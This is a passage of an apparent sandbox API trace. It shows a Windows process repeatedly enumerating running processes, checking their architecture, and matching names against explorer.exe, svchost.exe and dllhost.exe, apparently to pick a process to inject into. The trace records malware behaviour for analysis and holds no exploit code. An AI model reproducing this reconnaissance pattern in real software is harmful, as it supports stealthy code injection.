lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0219.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0219.728] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0219.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0219.728] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.728] CloseHandle (hObject=0xd8) returned 1 [0219.729] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0219.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0219.729] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.729] CloseHandle (hObject=0xd8) returned 1 [0219.729] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0219.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0219.730] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.730] CloseHandle (hObject=0xd8) returned 1 [0219.730] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0219.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0219.730] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.730] CloseHandle (hObject=0xd8) returned 1 [0219.730] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0219.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0219.731] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.731] CloseHandle (hObject=0xd8) returned 1 [0219.731] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0219.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0219.731] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.731] CloseHandle (hObject=0xd8) returned 1 [0219.731] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0219.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0219.732] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.732] CloseHandle (hObject=0xd8) returned 1 [0219.732] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0219.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0219.733] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.733] CloseHandle (hObject=0xd8) returned 1 [0219.733] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0219.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0219.733] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.733] CloseHandle (hObject=0xd8) returned 1 [0219.733] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0219.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0219.734] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.734] CloseHandle (hObject=0xd8) returned 1 [0219.734] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0219.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0219.735] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.735] CloseHandle (hObject=0xd8) returned 1 [0219.735] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0219.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0219.735] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.735] CloseHandle (hObject=0xd8) returned 1 [0219.735] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0219.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0219.736] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.736] CloseHandle (hObject=0xd8) returned 1 [0219.736] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0219.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0219.736] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.736] CloseHandle (hObject=0xd8) returned 1 [0219.736] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0219.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0219.737] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.737] CloseHandle (hObject=0xd8) returned 1 [0219.737] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0219.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0219.737] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.738] CloseHandle (hObject=0xd8) returned 1 [0219.738] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0219.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0219.738] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.738] CloseHandle (hObject=0xd8) returned 1 [0219.738] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0219.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0219.739] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.739] CloseHandle (hObject=0xd8) returned 1 [0219.739] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0219.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0219.739] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.739] CloseHandle (hObject=0xd8) returned 1 [0219.739] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0219.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0219.740] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.740] CloseHandle (hObject=0xd8) returned 1 [0219.740] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0219.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0219.740] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.741] CloseHandle (hObject=0xd8) returned 1 [0219.741] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0219.741] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0219.742] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0219.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0219.742] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0219.743] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0219.743] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0219.744] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.744] CloseHandle (hObject=0xd8) returned 1 [0219.744] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0219.744] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0219.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0219.744] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.744] CloseHandle (hObject=0xd8) returned 1 [0219.744] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0219.744] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0219.744] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0219.744] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0219.745] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0219.745] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.745] CloseHandle (hObject=0xd8) returned 1 [0219.745] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0219.746] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.746] CloseHandle (hObject=0xd8) returned 1 [0219.746] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0219.746] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0219.747] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.747] CloseHandle (hObject=0xd8) returned 1 [0219.747] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.747] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0219.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0219.748] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0219.748] CloseHandle (hObject=0xd8) returned 1 [0219.748] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0219.748] CloseHandle (hObject=0xd4) returned 1 [0219.748] Sleep (dwMilliseconds=0x3e8) [0220.811] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0220.813] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0220.814] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0220.815] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0220.815] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0220.816] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0220.816] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0220.817] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0220.817] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0220.818] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0220.818] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0220.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0220.819] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0220.819] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0220.820] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0220.820] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0220.821] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0220.821] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0220.822] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0220.822] Process32Next (in: 